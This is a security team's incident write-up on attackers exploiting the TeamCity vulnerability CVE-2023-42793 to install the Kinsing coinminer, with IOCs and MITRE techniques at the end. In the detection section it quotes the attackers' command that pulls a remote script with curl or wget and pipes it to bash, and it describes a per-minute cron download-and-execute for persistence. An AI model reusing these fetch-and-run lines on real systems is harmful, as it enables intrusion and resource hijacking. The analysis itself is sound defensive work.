JetBrains TeamCity Vulnerability (CVE-2023-42793) - Observation of Active Exploitation In The Wild (ITW)
This post was authored by Baharuddin.
This article is intended to give an overall picture on an intrusion attack on our observatory farm that utilized a Coinminer malware after the attacker successfully compromised the server.
This article might be useful for cybersecurity professionals to catch up with the latest malware trends observed in the wild. By the end of this article, readers will gain a comprehensive understanding of the techniques and tactics employed by the Coinminer malware operator from the initial access to the full impact of the attack. Additionally, security analysts can utilize the provided Indicators of Compromise (IOCs) associated with this Coinminer malware infection to assess whether their environment has been compromised.
In this article, NBS team try to bring readers to understand an attack that abusing JetBrains TeamCity vulnerability Authentication Bypass Flaw which led to Remote Code Execution (CVE-2023-42793) as their initial access. The vulnerability was discovered by the PTSWARM team and was abused by various threat actors to spread their malware. This article will be mainly focus on the malicious activity by the threat actor from the initial access to the impact of the attack which is deploying a Coinminer whereby the malware will utilized the resources of compromised server to perform cryptocurrency mining.
2.0 Flow Diagram of the Attack
|Figure 1: Flow diagram of the attack
The figure above shows a diagram of the attack flow involving the infection of the Coinminer malware. The detailed analysis and flow of attack will be discussed in the section below.
3.0 Case Summary
The attacker identified the vulnerable TeamCity application, which was running on our observatory farm. With the remote code execution (RCE) vulnerability, the attacker abuses the vulnerability with payload to download and execute a malicious bash script, 'tc.sh' into the server. The script includes instructions to download a Linux binary file called 'kinsing' which is a Coinminer malware that are compiled in Golang. Additionally, the script also contains a few instructions to terminate specific processes and cronjobs entries.
Furthermore, the execution of the 'kinsing' ELF led to the creation of a process named 'kdevtmpfsi' ELF where the binary was located in the temporary directory Linux (/tmp). The attacker then creates a new cronjob to download and execute another bash script with name 'tc.sh' which is scheduled to run every minute. To cover their tracks, the attacker continues to delete all the files associated with the attack, except for the process named 'kdevtmpfsi' which was kept running on the server. The attacker then proceeded with cryptocurrency mining.
|Figure 2: Detection of remote command execution on TeamCity application log in Splunk
Upon analysing the TeamCity application log, the NBS team has verified the execution of two commands as part of exploiting a remote code execution (RCE) vulnerability in the vulnerable JetBrains TeamCity. The NBS team observed the attack start when the command was executed as highlighted in Figure 2. The attack was confirmed when the 'tc.sh' was executed. The successfully executed command was '/bin/sh -c "(curl -s 188.8.131.52/tc.sh||wget -q -O- 184.108.40.206/tc.sh)|bash"' which indicates the instruction to read the content of Bash script 'tc.sh' from 220.127.116.11 and execute that content.
5.0 Analysis of the Attack
5.1 Exploitation on RCE for Initial Access
The attack began with the exploitation of RCE on the JetBrains TeamCity application. The NBS team managed to get retrieve the executed bash script 'tc.sh' and analyze the content of the Bash script.
|Figure 3: Content bash script download malicious binary
As seen in Figure 3, the bash script fetched two files, 'kinsing' and 'libsystem.so' from the attacker's server. Both files will be saved in the /etc/data directory.
|Figure 4: Content bash script terminate processes
The script then continues to kill several running processes such as SSH service, htop and others. It also finds and kills other cryptominer binary such as the monero and the supportxmr. It also killed a bunch of processes which considered as resource competition. By terminating other processes, especially on those that consume more server resources, the Coinminer malware (kinsing) ensures that it has the maximum computational power available for cryptocurrency mining. For example, as shown in Figure 4, IP addresses 18.104.22.168 and 22.214.171.124 were associated with another cryptocurrency activity. Hence, this script will kill any processes whose command line include those two IP addresses.
|Figure 5: Content bash script clear schedule tasks
Further analysis on the bash script, the NBS team observed the function (cleanCron) will remove all the scheduled jobs that running in the server. Figure 5 shows a list of keywords that will be removed accordingly in cronjob content if it match with the keyword.
|Figure 6: Content bash script Cronjob creation
Finally, the bash script deploy a persistent mechanism by adding entry in the scheduled jobs in the server to get the content on the Bash script from http://126.96.36.199/tc.sh and runs that script every minute. Moreover, it also has instructions to clear the Linux history command in the infected server.
Unfortunately, the NBS team is unable to retrieve the content of the bash script hosted at http://188.8.131.52/tc.sh to analyze the content within that script.
5.2 Execution of Coinminer Malware (Kinsing)
After successfully executed the bash script, the SSH session automatically terminated because of a process termination. The NBS team accesses the compromised server console directly to identify indicators of attack in the server.
|Figure 7: List downloaded files
The NBS team noted that two files were downloaded earlier in directory /etc/data. Further analysis confirmed that both files in the elf format which is commonly used on Linux system for executable file (kinsing) and shared object library (libsystem.so).
|Figure 8: Detection of the file kinsing on Virus Total
According to Virus Total, the kinsing ELF has been detected by 38 security vendors. Additionally, it has been tagged with the categories Trojan, Miner and Downloader.
|Figure 9: Detection of the file libsystem.so on Virus Total
The same result for the shared library file (libsystem.so) was flagged malicious by VirusTotal with detection on 43 security vendors. It has also been categorized under Miner and Rootkit variant for Linux system.
The NBS team proceeds to analyze kinsing ELF. It was noted that kinsing ELF will create another ELF named kdevtmpfsi in /tmp/ directory.
|Figure 11: Detection of the file kdevtmpfsi on Virus Total
Detection on Virus Total flagged kdevtmpfsi elf as malicious due to Coinminer malware.
|Figure 12: Process creation monitoring on Splunk
Based on the analysis of process creation on the compromised server, the NBS team observed that there are three processes spawn associated with this Coinminer malware activity. They are as follows:
1) kinsing: The Coinminer malware that is download from the success execution of bash script tc.sh
2) kdevtmpfsi: The Coinminer malware spawns after the execution of kinsing ELF
3) wget: Process behind the file download on cronjob (explaination in the next section)
|Figure 13: Detail information on process kdevtmpfsi
Figure 13 provides detail about files, network connection and other resources behind the creation of the process kdevtmpfsi. This process also established connection to IP address 184.108.40.206.
5.3 Persistence Mechanism via Scheduled Task (Cronjob)
Persistence is the technique that attackers perform to maintain access or control the compromised server. In this analysis of the compromised TeamCity application server, the technique used by the attacker involved adding a scheduled task in the Cronjob.
|Figure 14: Content Cronjob on the infected server
|Figure 15: Execution of the scheduled task in Cronjob
The attacker adds scheduled task to download the file named 'unk.sh' from 220.127.116.11 using wget Linux command and pipe (|) as the input to the sh command. In other word, it downloads and immediately runs the script. The command output was sent to /dev/null to ensure that the generated output or error message were intentionally discarded.
The scheduled task will execute every minute and Figure 15 shows the proof of cronjob execution in the compromised server. Unfortunately, the bash script 'unk.sh' cannot be retrieved by the NBS team for further analysis of the content.
5.4 Resource Hijacking for the Impact of Attack
|Figure 16: Resource consumption in the infected server
Figure 16 shows 100 percent CPU utilization by kdevtmpfsi. The Coinminer malware intended to monopolize CPU resources, leaving fewer for other processes and applications. This can impact the performance of other running applications in the infected system, causing disruption of the services and delay.
By exploiting RCE vulnerability on that TeamCity application, the threat actors successfully execute the malicious script and continue to abuse the server's resource for cryptomining. As a results, the servers may no longer be able to performs it tasks as it was supposed to. It is essential for organization to ensure all application is up to date to minimize the risk from being compromised.
7.0 Indicator of Compromises (IOCs)
- 99f1f8e4b1bd4cd55efc0cf7aba73971 - Bash script (tc.sh)
- b3039abf2ad5202f4a9363b418002351 - kinsing
- ccef46c7edf9131ccffc47bd69eb743b - libsystem.so
- c82bb3c68f7a033b407aa3f53827b7fd - kdevtmpfsi
- T1190 – Exploit Public Facing Application
- T1059.004 – Command and Scripting Interpreter: Unix Shell
- T1057 – Process Discovery
- T1053.003 – Scheduled Task/Job: Cron
- T1489 – Service Stop
- T1496 – Resource Hijacking